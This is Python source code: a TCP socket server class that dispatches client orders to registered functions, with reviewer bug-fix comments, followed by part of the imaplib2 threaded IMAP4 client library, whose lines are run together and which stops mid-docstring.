    """Main builder for the sockets-over-TCP server.

    By default the server allows an unlimited number of clients but
    accepts them one at a time; listen_connections() can accept several
    at once.  When a client connects, the server registers it and (when
    self.threaded[1] is set) assigns one process to listen for its
    orders and run the matching functions from order_dict.
    """

    def __init__(self, ip:str=None, port:int=12412, password:str=None,
                 max_connections:int=-1, order_dict:dict=None):
        # [spawn accept processes, spawn listener processes] — both off.
        self.threaded = [False, False]
        logging.debug(f"Server.__init__(self, {ip}, {port}, {password}, {max_connections})")
        self.__manager = Manager()
        # Manager-backed maps so worker processes share the same state.
        self._client_from_addr = self.__manager.dict()
        self._process_from_addr = {}
        self.open = self.__manager.dict()
        # Fix: the old `order_dict:dict={}` mutable default was shared
        # between every Server instance; use None as the sentinel.
        self.order_dict = order_dict if order_dict is not None else {}
        if(ip is None):
            ip = socket.gethostbyname_ex(socket.gethostname())[-1]
            if(type(ip) is list or type(ip) is tuple):
                ip = ip[-1]
            logging.warning(f"Ip set automatically to {ip}")
            # NOTE(review): this unconditional override discards the
            # detected address and always binds localhost — looks like a
            # debugging leftover; confirm before removing it.
            ip = "127.0.0.1"
            logging.warning(f"Ip set automatically to {ip}")
        self.ip = ip
        self.port = int(port)
        self.password = password
        # Any value below -1 is normalized to -1 ("unlimited").
        self.max_connections = int(max_connections) if max_connections >= -1 else -1
        self._connection = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        self._connection.bind((ip, port))
        logging.info("Created new server")

    # listen_connections sets up {connections} connections, that when
    # connected by a client, will assign one new process to that client.
    def listen_connections(self, connections:int=1, ip:str=None,
                           port:int=None) -> None:
        logging.debug(f"Server.listen_connections(self, {connections}, {ip}, {port})")
        if(ip is None):
            ip = self.ip
        if(port is None):
            port = self.port
        else:
            self.port = int(port)
        if(self.threaded[0]):
            process = []
            for _ in range(connections):
                process.append(Process(target=self.new_connection,
                                       args=(ip, port)))
                print("stop")
                process[-1].start()
            for conn in process:
                conn.join()
        else:
            self.new_connection(ip, port)

    # new_connection waits for one client; once accepted the client is
    # registered and served, inline or in its own process.
    def new_connection(self, ip:str=None, port:int=None) -> None:
        logging.debug(f"Server.new_connection(self, {ip}, {port})")
        # max_connections == -1 means unlimited (-1 + 1 == 0 is falsy).
        if(self.max_connections + 1
           and len(self._client_from_addr) >= self.max_connections):
            return
        if(ip is None):
            ip = self.ip
        if(port is None):
            port = self.port
        self._connection.listen()
        listener, addr = self._connection.accept()
        logging.info(f"Connected new user: {addr}")
        self._client_from_addr[addr] = listener
        self.open[addr] = True
        if(self.threaded[1]):
            self._process_from_addr[addr] = Process(target=self.listen,
                                                    args=(addr, listener))
            self._process_from_addr[addr].start()
        else:
            self.listen(addr, listener)

    # sendto (kind of) overloads socket.socket.sendto: encodes message
    # as utf-8 bytes and sends it to the client at the given address.
    def sendto(self, message:str, addr:tuple) -> "iterable":
        self._client_from_addr[addr].sendto(bytes(str(message), "utf-8"), addr)

    # sendall (kind of) overloads socket.socket.sendall: encodes message
    # as utf-8 bytes and sends it to all clients (untested).
    def sendall(self, message:str):
        self._connection.sendall(bytes(str(message), "utf-8"))

    # listen optionally authenticates the client, then reads orders
    # until the connection closes, dispatching each to parse_data.
    def listen(self, addr:tuple, listener:"socket.socket") -> "generator[str]":
        logging.debug("Client.listen(self)")
        if(not self.open[addr]):
            return
        with listener:
            timeout = 0
            if(not self.password is None):
                wrong_att = 0
                accepted = False
                while(not accepted):
                    password = listener.recv(1024)
                    decoded_password = password.decode("utf-8")
                    # Fix: recv() returns b'' (never None) when the peer
                    # is gone; the old `is None` test meant the timeout
                    # counter never advanced and this loop spun forever.
                    if(not password):
                        timeout += 1
                        if(timeout > 9):
                            self.open[addr] = False
                            break
                    else:
                        timeout = 0
                        if(decoded_password == self.password):
                            accepted = True
                            del wrong_att
                            del password
                            del decoded_password
                        else:
                            wrong_att += 1
                            if(wrong_att > 3):
                                del wrong_att
                                self.open[addr] = False
                                break
            while(self.open[addr]):
                data = listener.recv(1024)
                decoded_data = data.decode("utf-8")
                # Fix: same emptiness test as above so disconnects are
                # actually detected instead of looping on b''.
                if(not data):
                    timeout += 1
                    logging.debug(f"Timeout of user {addr} increased to {timeout}")
                    if(timeout > 9):
                        logging.warning(f"User {addr} has disconnected")
                        break
                elif(decoded_data != ''):
                    timeout = 0
                    logging.info(f"Recived data '{decoded_data}' from address {addr}")
                    self.parse_data(decoded_data, addr)
        # Fix: in non-threaded mode no process was ever registered for
        # addr, so the plain `del` raised KeyError; pop() is safe.
        self._process_from_addr.pop(addr, None)
        del self._client_from_addr[addr]
        del self.open[addr]

    # parse_data splits the client string on ';': each token matching a
    # key in order_dict starts a new order; non-matching tokens become
    # its arguments.  The functions in order_dict must take addr as the
    # first parameter even if unnecessary.
    def parse_data(self, data:str, addr:str) -> None:
        order = None
        args = (addr,)
        for arg in data.split(';'):
            new_ord = self.order_dict.get(arg.strip(), None)
            print(f"arg:{arg}, new_ord:{new_ord}")
            if(not new_ord is None):
                # A new order begins: flush the previous one first.
                if(not order is None):
                    print(f"{order}{args}")
                    try:
                        order(*args)
                    except Exception as err:
                        # Fix: the f-prefix was missing here, so the
                        # literal text "{err}" was printed.
                        print(f"ERROR: {err}")
                order = new_ord
                args = (addr,)
            elif(arg.strip() != ''):
                args += (arg.strip(),)
        # Flush the final pending order, if any.
        if(not order is None):
            print(f"{order}{args}.")
            try:
                order(*args)
            except Exception as err:
                print(f"ERROR: {err}")
imaplib2.py
#!/usr/bin/env python """Threaded IMAP4 client. Based on RFC 2060 and original imaplib module. Public classes: IMAP4 IMAP4_SSL IMAP4_stream Public functions: Internaldate2Time ParseFlags Time2Internaldate """ __all__ = ("IMAP4", "IMAP4_SSL", "IMAP4_stream", "Internaldate2Time", "ParseFlags", "Time2Internaldate") __version__ = "2.19" __release__ = "2" __revision__ = "19" __credits__ = """ Authentication code contributed by Donn Cave <donn@u.washington.edu> June 1998. String method conversion by ESR, February 2001. GET/SETACL contributed by Anthony Baxter <anthony@interlink.com.au> April 2001. IMAP4_SSL contributed by Tino Lange <Tino.Lange@isg.de> March 2002. GET/SETQUOTA contributed by Andreas Zeidler <az@kreativkombinat.de> June 2002. PROXYAUTH contributed by Rick Holbert <holbert.13@osu.edu> November 2002. IDLE via threads suggested by Philippe Normand <phil@respyre.org> January 2005. GET/SETANNOTATION contributed by Tomas Lindroos <skitta@abo.fi> June 2005. COMPRESS/DEFLATE contributed by Bron Gondwana <brong@brong.net> May 2009. STARTTLS from Jython's imaplib by Alan Kennedy. ID contributed by Dave Baggett <dave@baggett.org> November 2009. Improved untagged responses handling suggested by Dave Baggett <dave@baggett.org> November 2009. Improved thread naming, and 0 read detection contributed by Grant Edwards <grant.b.edwards@gmail.com> June 2010. 
Improved timeout handling contributed by Ivan Vovnenko <ivovnenko@gmail.com> October 2010.""" __author__ = "Piers Lauder <piers@janeelix.com>" __URL__ = "http://janeelix.com/piers/python/imaplib2" __license__ = "Python License" import binascii, os, Queue, random, re, select, socket, sys, time, threading, zlib select_module = select # Globals CRLF = '\r\n' Debug = None # Backward compatibility IMAP4_PORT = 143 IMAP4_SSL_PORT = 993 IDLE_TIMEOUT_RESPONSE = '* IDLE TIMEOUT\r\n' IDLE_TIMEOUT = 60*29 # Don't stay in IDLE state longer READ_POLL_TIMEMOUT = 30 # Without this timeout interrupted network connections can hang reader AllowedVersions = ('IMAP4REV1', 'IMAP4') # Most recent first # Commands CMD_VAL_STATES = 0 CMD_VAL_ASYNC = 1 NONAUTH, AUTH, SELECTED, LOGOUT = 'NONAUTH', 'AUTH', 'SELECTED', 'LOGOUT' Commands = { # name valid states asynchronous 'APPEND': ((AUTH, SELECTED), False), 'AUTHENTICATE': ((NONAUTH,), False), 'CAPABILITY': ((NONAUTH, AUTH, SELECTED), True), 'CHECK': ((SELECTED,), True), 'CLOSE': ((SELECTED,), False), 'COMPRESS': ((AUTH,), False), 'COPY': ((SELECTED,), True), 'CREATE': ((AUTH, SELECTED), True), 'DELETE': ((AUTH, SELECTED), True), 'DELETEACL': ((AUTH, SELECTED), True), 'EXAMINE': ((AUTH, SELECTED), False), 'EXPUNGE': ((SELECTED,), True), 'FETCH': ((SELECTED,), True), 'GETACL': ((AUTH, SELECTED), True), 'GETANNOTATION':((AUTH, SELECTED), True), 'GETQUOTA': ((AUTH, SELECTED), True), 'GETQUOTAROOT': ((AUTH, SELECTED), True), 'ID': ((NONAUTH, AUTH, SELECTED), True), 'IDLE': ((SELECTED,), False), 'LIST': ((AUTH, SELECTED), True), 'LOGIN': ((NONAUTH,), False), 'LOGOUT': ((NONAUTH, AUTH, LOGOUT, SELECTED), False), 'LSUB': ((AUTH, SELECTED), True), 'MYRIGHTS': ((AUTH, SELECTED), True), 'NAMESPACE': ((AUTH, SELECTED), True), 'NOOP': ((NONAUTH, AUTH, SELECTED), True), 'PARTIAL': ((SELECTED,), True), 'PROXYAUTH': ((AUTH,), False), 'RENAME': ((AUTH, SELECTED), True), 'SEARCH': ((SELECTED,), True), 'SELECT': ((AUTH, SELECTED), False), 'SETACL': ((AUTH, 
SELECTED), False), 'SETANNOTATION':((AUTH, SELECTED), True), 'SETQUOTA': ((AUTH, SELECTED), False), 'SORT': ((SELECTED,), True), 'STARTTLS': ((NONAUTH,), False), 'STATUS': ((AUTH, SELECTED), True), 'STORE': ((SELECTED,), True), 'SUBSCRIBE': ((AUTH, SELECTED), False), 'THREAD': ((SELECTED,), True), 'UID': ((SELECTED,), True), 'UNSUBSCRIBE': ((AUTH, SELECTED), False), } UID_direct = ('SEARCH', 'SORT', 'THREAD') def Int2AP(num): """string = Int2AP(num) Return 'num' converted to a string using characters from the set 'A'..'P' """ val, a2p = [], 'ABCDEFGHIJKLMNOP' num = int(abs(num)) while num: num, mod = divmod(num, 16) val.insert(0, a2p[mod]) return ''.join(val) class Request(object): """Private class to represent a request awaiting response.""" def __init__(self, parent, name=None, callback=None, cb_arg=None): self.name = name self.callback = callback # Function called to process result self.callback_arg = cb_arg # Optional arg passed to "callback" self.tag = '%s%s' % (parent.tagpre, parent.tagnum) parent.tagnum += 1 self.ready = threading.Event() self.response = None self.aborted = None self.data = None def abort(self, typ, val): self.aborted = (typ, val) self.deliver(None) def get_response(self, exc_fmt=None): self.callback = None self.ready.wait() if self.aborted is not None: typ, val = self.aborted if exc_fmt is None: exc_fmt = '%s - %%s' % typ raise typ(exc_fmt % str(val)) return self.response def deliver(self, response): if self.callback is not None: self.callback((response, self.callback_arg, self.aborted)) return self.response = response self.ready.set() class IMAP4(object): """Threaded IMAP4 client class. Instantiate with: IMAP4(host=None, port=None, debug=None, debug_file=None, identifier=None) host - host's name (default: localhost); port - port number (default: standard IMAP4 port); debug - debug level (default: 0 - no debug); debug_file - debug stream (default: sys.stderr); identifier - thread identifier prefix (default: host). 
All IMAP4rev1 commands are supported by methods of the same name. Each command returns a tuple: (type, [data, ...]) where 'type' is usually 'OK' or 'NO', and 'data' is either the text from the tagged response, or untagged results from command. Each 'data' is either a string, or a tuple. If a tuple, then the first part is the header of the response, and the second part contains the data (ie: 'literal' value). Errors raise the exception class <instance>.error("<reason>"). IMAP4 server errors raise <instance>.abort("<reason>"), which is a sub-class of 'error'. Mailbox status changes from READ-WRITE to READ-ONLY raise the exception class <instance>.readonly("<reason>"), which is a sub-class of 'abort'. "error" exceptions imply a program error. "abort" exceptions imply the connection should be reset, and the command re-tried. "readonly" exceptions imply the command should be re-tried. All commands take two optional named arguments: 'callback' and 'cb_arg' If 'callback' is provided then the command is asynchronous, so after the command is queued for transmission, the call returns immediately with the tuple (None, None). The result will be posted by invoking "callback" with one arg, a tuple: callback((result, cb_arg, None)) or, if there was a problem: callback((None, cb_arg, (exception class, reason))) Otherwise the command is synchronous (waits for result). But note that state-changing commands will both block until previous commands have completed, and block subsequent commands until they have finished. All (non-callback) arguments to commands are converted to strings, except for AUTHENTICATE, and the last argument to APPEND which is passed as an IMAP4 literal. If necessary (the string contains any non-printing characters or white-space and isn't enclosed with either parentheses or double quotes) each string is quoted. However, the 'password' argument to the LOGIN command is always quoted. 
If you want to avoid having an argument string quoted (eg: the 'flags' argument to STORE) then enclose the string in parentheses (eg: "(\Deleted)"). There is one instance variable, 'state', that is useful for tracking whether the client needs to login to the server. If it has the value "AUTH" after instantiating the class, then the connection is pre-authenticated (otherwise it will be "NONAUTH"). Selecting a mailbox changes the state to be "SELECTED", closing a mailbox changes back to "AUTH", and once the client has logged out, the state changes to "LOGOUT" and no further commands may be issued. Note: to use this module, you must read the RFCs pertaining to the IMAP4 protocol, as the semantics of the arguments to each IMAP4 command are left to the invoker, not to mention the results. Also, most IMAP servers implement a sub-set of the commands available here. Note also that you must call logout() to shut down threads before discarding an instance. """ class error(Exception): pass # Logical errors - debug required class abort(error): pass # Service errors - close and retry class readonly(abort): pass # Mailbox status changed to READ-ONLY continuation_cre = re.compile(r'\+( (?P<data>.*))?') literal_cre = re.compile(r'.*{(?P<size>\d+)}$') mapCRLF_cre = re.compile(r'\r\n|\r|\n') # Need to quote "atom-specials" :- # "(" / ")" / "{" / SP / 0x00 - 0x1f / 0x7f / "%" / "*" / DQUOTE / "\" / "]" # so match not the inverse set mustquote_cre = re.compile(r"[^!#$&'+,./0-9:;<=>?@A-Z\[^_`a-z|}~-]") response_code_cre = re.compile(r'\[(?P<type>[A-Z-]+)( (?P<data>[^\]]*))?\]') untagged_response_cre = re.compile(r'\* (?P<type>[A-Z-]+)( (?P<data>.*))?') untagged_status_cre = re.compile(r'\* (?P<data>\d+) (?P<type>[A-Z-]+)( (?P<data2>.*))?') def __init__(self, host=None, port=None, debug=None, debug_file=None, identifier=None): self.state = NONAUTH # IMAP4 protocol state self.literal = None # A literal argument to a command self.tagged_commands = {} # Tagged commands awaiting response 
self.untagged_responses = [] # [[typ: [data, ...]], ...] self.mailbox = None # Current mailbox selected self.mailboxes = {} # Untagged responses state per mailbox self.is_readonly = False # READ-ONLY desired state self.idle_rqb = None # Server IDLE Request - see _IdleCont self.idle_timeout = None # Must prod server occasionally self._expecting_data = 0 # Expecting message data self._accumulated_data = [] # Message data accumulated so far self._literal_expected = None # Message data descriptor self.compressor = None # COMPRESS/DEFLATE if not None self.decompressor = None # Create unique tag for this session, # and compile tagged response matcher. self.tagnum = 0 self.tagpre = Int2AP(random.randint(4096, 65535)) self.tagre = re.compile(r'(?P<tag>' + self.tagpre + r'\d+) (?P<type>[A-Z]+) (?P<data>.*)') if __debug__: self._init_debug(debug, debug_file) # Open socket to server. self.open(host, port) if __debug__: if debug: self._mesg('connected to %s on port %s' % (self.host, self.port)) # Threading if identifier is not None: self.identifier = identifier else: self.identifier = self.host if self.identifier: self.identifier += ' ' self.Terminate = False self.state_change_free = threading.Event() self.state_change_pending = threading.Lock() self.commands_lock = threading.Lock() self.ouq = Queue.Queue(10) self.inq = Queue.Queue() self.wrth = threading.Thread(target=self._writer) self.wrth.start() self.rdth = threading.Thread(target=self._reader) self.rdth.start() self.inth = threading.Thread(target=self._handler) self.inth.start() # Get server welcome message, # request and store CAPABILITY response. 
try: self.welcome = self._request_push(tag='continuation').get_response('IMAP4 protocol error: %s')[1] if self._get_untagged_response('PREAUTH'): self.state = AUTH if __debug__: self._log(1, 'state => AUTH') elif self._get_untagged_response('OK'): if __debug__: self._log(1, 'state => NONAUTH') else: raise self.error(self.welcome) typ, dat = self.capability() if dat == [None]: raise self.error('no CAPABILITY response from server') self.capabilities = tuple(dat[-1].upper().split()) if __debug__: self._log(3, 'CAPABILITY: %r' % (self.capabilities,)) for version in AllowedVersions: if not version in self.capabilities: continue self.PROTOCOL_VERSION = version break else: raise self.error('server not IMAP4 compliant') except: self._close_threads() raise def __getattr__(self, attr): # Allow UPPERCASE variants of IMAP4 command methods. if attr in Commands: return getattr(self, attr.lower()) raise AttributeError("Unknown IMAP4 command: '%s'" % attr) # Overridable methods def open(self, host=None, port=None): """open(host=None, port=None) Setup connection to remote server on "host:port" (default: localhost:standard IMAP4 port). 
This connection will be used by the routines: read, send, shutdown, socket.""" self.host = host is not None and host or '' self.port = port is not None and port or IMAP4_PORT self.sock = self.open_socket() self.read_fd = self.sock.fileno() def open_socket(self): """open_socket() Open socket choosing first address family available.""" msg = (-1, 'could not open socket') for res in socket.getaddrinfo(self.host, self.port, socket.AF_UNSPEC, socket.SOCK_STREAM): af, socktype, proto, canonname, sa = res try: s = socket.socket(af, socktype, proto) except socket.error, msg: continue try: s.connect(sa) except socket.error, msg: s.close() continue break else: raise socket.error(msg) return s def start_compressing(self): """start_compressing() Enable deflate compression on the socket (RFC 4978).""" # rfc 1951 - pure DEFLATE, so use -15 for both windows self.decompressor = zlib.decompressobj(-15) self.compressor = zlib.compressobj(zlib.Z_DEFAULT_COMPRESSION, zlib.DEFLATED, -15) def read(self, size): """data = read(size) Read at most 'size' bytes from remote.""" if self.decompressor is None: return self.sock.recv(size) if self.decompressor.unconsumed_tail: data = self.decompressor.unconsumed_tail else: data = self.sock.recv(8192) return self.decompressor.decompress(data, size) def send(self, data): """send(data) Send 'data' to remote.""" if self.compressor is not None: data = self.compressor.compress(data) data += self.compressor.flush(zlib.Z_SYNC_FLUSH) self.sock.sendall(data) def shutdown(self): """shutdown() Close I/O established in "open".""" self.sock.close() def socket(self): """socket = socket() Return socket instance used to connect to IMAP4 server.""" return self.sock # Utility methods def enable_compression(self): """enable_compression() Ask the server to start compressing the connection. 
Should be called from user of this class after instantiation, as in: if 'COMPRESS=DEFLATE' in imapobj.capabilities: imapobj.enable_compression()""" try: typ, dat = self._simple_command('COMPRESS', 'DEFLATE') if typ == 'OK': self.start_compressing() if __debug__: self._log(1, 'Enabled COMPRESS=DEFLATE') finally: self.state_change_pending.release() def pop_untagged_responses(self): """ for typ,data in pop_untagged_responses(): pass Generator for any remaining untagged responses. Returns and removes untagged responses in order of reception. Use at your own risk!""" while self.untagged_responses: self.commands_lock.acquire() try: yield self.untagged_responses.pop(0) finally: self.commands_lock.release() def recent(self, **kw): """(typ, [data]) = recent() Return 'RECENT' responses if any exist, else prompt server for an update using the 'NOOP' command. 'data' is None if no new messages, else list of RECENT responses, most recent last.""" name = 'RECENT' data = [] while True: dat = self._get_untagged_response(name) if not dat: break data += dat if data: return self._deliver_dat(name, data, kw) kw['untagged_response'] = name return self.noop(**kw) # Prod server for response def response(self, code, **kw): """(code, [data]) = response(code) Return data for response 'code' if received, or None. Old value for response 'code' is cleared.""" typ, dat = self._untagged_response(code, [None], code.upper()) return self._deliver_dat(typ, dat, kw) # IMAP4 commands def append(self, mailbox, flags, date_time, message, **kw): """(typ, [data]) = append(mailbox, flags, date_time, message) Append message to named mailbox. 
All args except `message' can be None.""" name = 'APPEND' if not mailbox: mailbox = 'INBOX' if flags: if (flags[0],flags[-1]) != ('(',')'): flags = '(%s)' % flags else: flags = None if date_time: date_time = Time2Internaldate(date_time) else: date_time = None self.literal = self.mapCRLF_cre.sub(CRLF, message) try: return self._simple_command(name, mailbox, flags, date_time, **kw) finally: self.state_change_pending.release() def authenticate(self, mechanism, authobject, **kw): """(typ, [data]) = authenticate(mechanism, authobject) Authenticate command - requires response processing. 'mechanism' specifies which authentication mechanism is to be used - it must appear in <instance>.capabilities in the form AUTH=<mechanism>. 'authobject' must be a callable object: data = authobject(response) It will be called to process server continuation responses. It should return data that will be encoded and sent to server. It should return None if the client abort response '*' should be sent instead.""" self.literal = _Authenticator(authobject).process try: typ, dat = self._simple_command('AUTHENTICATE', mechanism.upper()) if typ != 'OK': self._deliver_exc(self.error, dat[-1], kw) self.state = AUTH if __debug__: self._log(1, 'state => AUTH') finally: self.state_change_pending.release() return self._deliver_dat(typ, dat, kw) def capability(self, **kw): """(typ, [data]) = capability() Fetch capabilities list from server.""" name = 'CAPABILITY' kw['untagged_response'] = name return self._simple_command(name, **kw) def check(self, **kw): """(typ, [data]) = check() Checkpoint mailbox on server.""" return self._simple_command('CHECK', **kw) def close(self, **kw): """(typ, [data]) = close() Close currently selected mailbox. Deleted messages are removed from writable mailbox. 
This is the recommended command before 'LOGOUT'.""" if self.state != 'SELECTED': raise self.error('No mailbox selected.') try: typ, dat = self._simple_command('CLOSE') finally: self.state = AUTH if __debug__: self._log(1, 'state => AUTH') self.state_change_pending.release() return self._deliver_dat(typ, dat, kw) def copy(self, message_set, new_mailbox, **kw): """(typ, [data]) = copy(message_set, new_mailbox) Copy 'message_set' messages onto end of 'new_mailbox'.""" return self._simple_command('COPY', message_set, new_mailbox, **kw) def create(self, mailbox, **kw): """(typ, [data]) = create(mailbox) Create new mailbox.""" return self._simple_command('CREATE', mailbox, **kw) def delete(self, mailbox, **kw): """(typ, [data]) = delete(mailbox) Delete old mailbox.""" return self._simple_command('DELETE', mailbox, **kw) def deleteacl(self, mailbox, who, **kw): """(typ, [data]) = deleteacl(mailbox, who) Delete the ACLs (remove any rights) set for who on mailbox.""" return self._simple_command('DELETEACL', mailbox, who, **kw) def examine(self, mailbox='INBOX', **kw): """(typ, [data]) = examine(mailbox='INBOX', readonly=False) Select a mailbox for READ-ONLY access. (Flushes all untagged responses.) 'data' is count of messages in mailbox ('EXISTS' response). Mandated responses are ('FLAGS', 'EXISTS', 'RECENT', 'UIDVALIDITY'), so other responses should be obtained via "response('FLAGS')" etc.""" return self.select(mailbox=mailbox, readonly=True, **kw) def expunge(self, **kw): """(typ, [data]) = expunge() Permanently remove deleted items from selected mailbox. Generates 'EXPUNGE' response for each deleted message. 'data' is list of 'EXPUNGE'd message numbers in order received.""" name = 'EXPUNGE' kw['untagged_response'] = name return self._simple_command(name, **kw) def fetch(self, message_set, message_parts, **kw): """(typ, [data, ...]) = fetch(message_set, message_parts) Fetch (parts of) messages. 
'message_parts' should be a string of selected parts enclosed in parentheses, eg: "(UID BODY[TEXT])". 'data' are tuples of message part envelope and data, followed by a string containing the trailer.""" name = 'FETCH' kw['untagged_response'] = name return self._simple_command(name, message_set, message_parts, **kw) def getacl(self, mailbox, **kw): """(typ, [data]) = getacl(mailbox) Get the ACLs for a mailbox.""" kw['untagged_response'] = 'ACL' return self._simple_command('GETACL', mailbox, **kw) def getannotation(self, mailbox, entry, attribute, **kw): """(typ, [data]) = getannotation(mailbox, entry, attribute) Retrieve ANNOTATIONs.""" kw['untagged_response'] = 'ANNOTATION' return self._simple_command('GETANNOTATION', mailbox, entry, attribute, **kw) def getquota(self, root, **kw): """(typ, [data]) = getquota(root) Get the quota root's resource usage and limits. (Part of the IMAP4 QUOTA extension defined in rfc2087.)""" kw['untagged_response'] = 'QUOTA' return self._simple_command('GETQUOTA', root, **kw) def getquotaroot(self, mailbox, **kw): # Hmmm, this is non-std! Left for backwards-compatibility, sigh. # NB: usage should have been defined as: # (typ, [QUOTAROOT responses...]) = getquotaroot(mailbox) # (typ, [QUOTA responses...]) = response('QUOTA') """(typ, [[QUOTAROOT responses...], [QUOTA responses...]]) = getquotaroot(mailbox) Get the list of quota roots for the named mailbox.""" typ, dat = self._simple_command('GETQUOTAROOT', mailbox) typ, quota = self._untagged_response(typ, dat, 'QUOTA') typ, quotaroot = self._untagged_response(typ, dat, 'QUOTAROOT') return self._deliver_dat(typ, [quotaroot, quota], kw) def id(self, *kv_pairs, **kw): """(typ, [data]) = <instance>.id(kv_pairs) 'data' is list of ID key value pairs. Request information for problem analysis and determination. The ID extension is defined in RFC 2971. 
""" name = 'ID' kw['untagged_response'] = name return self._simple_command(name, *kv_pairs, **kw) def idle(self, timeout=None, **kw): """"(typ, [data]) = idle(timeout=None) Put server into IDLE mode until server notifies some change, or 'timeout' (secs) occurs (default: 29 minutes), or another IMAP4 command is scheduled.""" name = 'IDLE' self.literal = _IdleCont(self, timeout).process try: return self._simple_command(name, **kw) finally: self.state_change_pending.release() def list(self, directory='""', pattern='*', **kw): """(typ, [data]) = list(directory='""', pattern='*') List mailbox names in directory matching pattern. 'data' is list of LIST responses. NB: for 'pattern': % matches all except separator ( so LIST "" "%" returns names at root) * matches all (so LIST "" "*" returns whole directory tree from root)""" name = 'LIST' kw['untagged_response'] = name return self._simple_command(name, directory, pattern, **kw) def login(self, user, password, **kw): """(typ, [data]) = login(user, password) Identify client using plaintext password. NB: 'password' will be quoted.""" try: typ, dat = self._simple_command('LOGIN', user, self._quote(password)) if typ != 'OK': self._deliver_exc(self.error, dat[-1], kw) self.state = AUTH if __debug__: self._log(1, 'state => AUTH') finally: self.state_change_pending.release() return self._deliver_dat(typ, dat, kw) def login_cram_md5(self, user, password, **kw): """(typ, [data]) = login_cram_md5(user, password) Force use of CRAM-MD5 authentication.""" self.user, self.password = user, password return self.authenticate('CRAM-MD5', self._CRAM_MD5_AUTH, **kw) def _CRAM_MD5_AUTH(self, challenge): """Authobject to use with CRAM-MD5 authentication.""" import hmac return self.user + " " + hmac.HMAC(self.password, challenge).hexdigest() def logout(self, **kw): """(typ, [data]) = logout() Shutdown connection to server. Returns server 'BYE' response. 
NB: You must call this to shut down threads before discarding an instance.""" self.state = LOGOUT if __debug__: self._log(1, 'state => LOGOUT') try: typ, dat = self._simple_command('LOGOUT') except: typ, dat = 'NO', ['%s: %s' % sys.exc_info()[:2]] if __debug__: self._log(1, dat) self._close_threads() self.state_change_pending.release() if __debug__: self._log(1, 'connection closed') bye = self._get_untagged_response('BYE', leave=True) if bye: typ, dat = 'BYE', bye return self._deliver_dat(typ, dat, kw) def lsub(self, directory='""', pattern='*', **kw): """(typ, [data, ...]) = lsub(directory='""', pattern='*') List 'subscribed' mailbox names in directory matching pattern. 'data' are tuples of message part envelope and data.""" name = 'LSUB' kw['untagged_response'] = name return self._simple_command(name, directory, pattern, **kw) def myrights(self, mailbox, **kw): """(typ, [data]) = myrights(mailbox) Show my ACLs for a mailbox (i.e. the rights that I have on mailbox).""" name = 'MYRIGHTS' kw['untagged_response'] = name return self._simple_command(name, mailbox, **kw) def namespace(self, **kw): """(typ, [data, ...]) = namespace() Returns IMAP namespaces ala rfc2342.""" name = 'NAMESPACE' kw['untagged_response'] = name return self._simple_command(name, **kw) def noop(self, **kw): """(typ, [data]) = noop() Send NOOP command.""" if __debug__: self._dump_ur(3) return self._simple_command('NOOP', **kw) def partial(self, message_num, message_part, start, length, **kw): """(typ, [data, ...]) = partial(message_num, message_part, start, length) Fetch truncated part of a message. 'data' is tuple of message part envelope and data. NB: obsolete.""" name = 'PARTIAL' kw['untagged_response'] = 'FETCH' return self._simple_command(name, message_num, message_part, start, length, **kw) def proxyauth(self, user, **kw): """(typ, [data]) = proxyauth(user) Assume authentication as 'user'. 
(Allows an authorised administrator to proxy into any user's mailbox.)""" try: return self._simple_command('PROXYAUTH', user, **kw) finally: self.state_change_pending.release() def rename(self, oldmailbox, newmailbox, **kw): """(typ, [data]) = rename(oldmailbox, newmailbox) Rename old mailbox name to new.""" return self._simple_command('RENAME', oldmailbox, newmailbox, **kw) def search(self, charset, *criteria, **kw): """(typ, [data]) = search(charset, criterion, ...) Search mailbox for matching messages. 'data' is space separated list of matching message numbers.""" name = 'SEARCH' kw['untagged_response'] = name if charset: return self._simple_command(name, 'CHARSET', charset, *criteria, **kw) return self._simple_command(name, *criteria, **kw) def select(self, mailbox='INBOX', readonly=False, **kw): """(typ, [data]) = select(mailbox='INBOX', readonly=False) Select a mailbox. (Restores any previous untagged responses.) 'data' is count of messages in mailbox ('EXISTS' response). Mandated responses are ('FLAGS', 'EXISTS', 'RECENT', 'UIDVALIDITY'), so other responses should be obtained via "response('FLAGS')" etc.""" self.commands_lock.acquire() # Save state of old mailbox, restore state for new... self.mailboxes[self.mailbox] = self.untagged_responses self.untagged_responses = self.mailboxes.setdefault(mailbox, []) self.commands_lock.release() self.mailbox = mailbox self.is_readonly = readonly and True or False if readonly: name = 'EXAMINE' else: name = 'SELECT' try: rqb = self._command(name, mailbox) typ, dat = rqb.get_response('command: %s => %%s' % rqb.name) if typ != 'OK': if self.state == SELECTED: self.state = AUTH if __debug__: self._log(1, 'state => AUTH') if typ == 'BAD': self._deliver_exc(self.error, '%s command error: %s %s. 
Data: %.100s' % (name, typ, dat, mailbox), kw) return self._deliver_dat(typ, dat, kw) self.state = SELECTED if __debug__: self._log(1, 'state => SELECTED') finally: self.state_change_pending.release() if self._get_untagged_response('READ-ONLY', leave=True) and not readonly: if __debug__: self._dump_ur(1) self._deliver_exc(self.readonly, '%s is not writable' % mailbox, kw) typ, dat = self._untagged_response(typ, [None], 'EXISTS') return self._deliver_dat(typ, dat, kw) def setacl(self, mailbox, who, what, **kw): """(typ, [data]) = setacl(mailbox, who, what) Set a mailbox acl.""" try: return self._simple_command('SETACL', mailbox, who, what, **kw) finally: self.state_change_pending.release() def setannotation(self, *args, **kw): """(typ, [data]) = setannotation(mailbox[, entry, attribute]+) Set ANNOTATIONs.""" kw['untagged_response'] = 'ANNOTATION' return self._simple_command('SETANNOTATION', *args, **kw) def setquota(self, root, limits, **kw): """(typ, [data]) = setquota(root, limits) Set the quota root's resource limits.""" kw['untagged_response'] = 'QUOTA' try: return self._simple_command('SETQUOTA', root, limits, **kw) finally: self.state_change_pending.release() def sort(self, sort_criteria, charset, *search_criteria, **kw): """(typ, [data]) = sort(sort_criteria, charset, search_criteria, ...) 
